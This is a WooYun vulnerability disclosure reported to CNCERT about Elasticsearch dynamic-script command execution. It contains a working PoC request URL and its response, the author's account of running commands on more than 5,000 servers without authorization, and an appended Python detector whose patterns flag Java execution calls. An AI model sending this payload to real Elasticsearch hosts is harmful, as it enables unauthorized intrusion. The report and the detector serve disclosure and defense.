Vulnerability summary

Defect ID: wooyun-2014-066218

Title: How I built a "5000+ cluster-server botnet" in 2 hours

Related vendor: CNCERT (National Internet Emergency Center)

Author: 路人甲

Submitted: 2014-06-25 19:00

Fixed: 2014-08-09 19:02

Published: 2014-08-09 19:02

Vulnerability type: successful intrusion event

Severity: high

Self-assessed rank: 20

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-06-25: details sent to the vendor, awaiting vendor handling
2014-06-29: vendor confirmed; details visible to the vendor only
2014-07-09: details opened to core white hats and domain experts
2014-07-19: details opened to regular white hats
2014-07-29: details opened to intern white hats
2014-08-09: details opened to the public

Brief description:

Within 2 hours, "hello world" was successfully printed on more than 5000 servers. @CNCERT National Internet Emergency Center

Detailed description:

Because of an Elasticsearch command-execution vulnerability, more than ten thousand servers are affected; none of the IPs in the screenshot are duplicates. Within 2 hours the relevant command was executed successfully on more than 5000 servers.

[Screenshot: 2.png]

This was only a technical test of the vulnerability's scope, and the title is clickbait. Of 700 domestic cluster servers tested, more than 170 succeeded. In total only 14,000 IPs were tested, with a success rate close to 50%.

Proof of vulnerability:

Run the PoC:

http://xx.xx.xx.xx:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}


The result is as follows:

[Screenshot: 1.png]


{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":140847,"max_score":1.0,"hits":[{"_index":"cai","_type":"loganalysis","_id":"f2bb7c30-ab55-11e3-9940-22000a9a8b23","_score":1.0,"fields":{"exp":"[os:Linux-ec2-user/]"}}]}}


The response returns the operating system type and the username of the account running Elasticsearch.
Affected domestic IPs:

Fix:

Restrict which IPs can access the service.

Copyright notice: when reposting, credit the source as 路人甲@乌云 (WooYun).
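A defender-side check to go with the fix above, added here and not part of the original report: it scans access-log lines (constructed samples in combined-log format, assumed to come from a proxy in front of port 9200) for _search requests whose URL-encoded source body carries script_fields with Java calls like the PoC's System.getProperty, and falls back to scanning raw text when the body is not valid JSON. Beyond restricting IP access, Elasticsearch 1.x nodes should also set script.disable_dynamic: true, which is the setting this PoC relies on being off.

```python
import json
import re
from urllib.parse import unquote, urlparse

# Substrings that show Java code being handed to Elasticsearch's dynamic (MVEL) script engine.
JAVA_MARKERS = ("System.getProperty", "Runtime.getRuntime", "ProcessBuilder", "java.lang.", "java.io.")
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*"')

def source_params(query_string):
    """Percent-decode every source= value (Elasticsearch accepts the search body there)."""
    pairs = (p.partition("=") for p in query_string.split("&"))
    return [unquote(v) for n, _, v in pairs if n == "source"]

def scripts_in_body(body):
    """Return every script string found under script_fields in a parsed search body."""
    fields = body.get("script_fields", {}) if isinstance(body, dict) else {}
    return [f["script"] for f in fields.values() if isinstance(f, dict) and isinstance(f.get("script"), str)]

def analyse_request(path):
    """Return (reason, script) when a _search request carries a dynamic script, else None."""
    url = urlparse(path)
    if not url.path.endswith("/_search"):
        return None
    for src in source_params(url.query):
        try:
            scripts, parsed = scripts_in_body(json.loads(src)), True
        except ValueError:
            scripts, parsed = [src], False  # malformed JSON: scan the raw text instead
        for script in scripts:
            if any(marker in script for marker in JAVA_MARKERS):
                return ("java-call-in-script", script)
        if parsed and scripts:
            return ("script_fields-present", scripts[0])  # scripting in use, lower severity
    return None

def find_script_probes(log_lines):
    """Return (client_ip, reason, script) for each access-log line that looks like a probe."""
    hits = []
    for m in filter(None, map(LOG_RE.match, log_lines)):
        verdict = analyse_request(m.group("path"))
        if verdict:
            hits.append((m.group("ip"),) + verdict)
    return hits

# Constructed sample lines (not from the report): a benign query and a probe shaped like the PoC.
SAMPLE_LOG = [
    '10.1.2.3 - - [25/Jun/2014:19:00:01 +0800] "GET /_search?q=user:alice HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Jun/2014:19:00:02 +0800] "GET /_search?source={%22size%22:1,%22script_fields%22:{%22exp%22:'
    '{%22script%22:%22String%20str%3DSystem.getProperty(\\%22os.name\\%22)%2b\\%22-\\%22%2bSystem.getProperty(\\%22user.name\\%22);%22}}} HTTP/1.1" 200 330',
]
```

Running find_script_probes(SAMPLE_LOG) flags only the second line, reporting the client IP and the decoded script so the alert can be triaged without re-decoding the URL by hand.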


Vulnerability response

Vendor response:

Severity: high

Vulnerability rank: 20

Confirmed: 2014-06-29 21:34

Vendor reply:

CNVD has already carried out a round of inspections of government departments for this vulnerability; as of the 27th, only one affected government-department case has been found so far. For the described vulnerability, Knownsec (zoomeye), a CNVD technical group member unit, has been engaged to assist in completing detection across the whole Internet, and IP screening of key users continues. Batch detection fits well with CNCERT's approach to network-wide emergency response and is encouraged. rank 20

Latest status:

None yet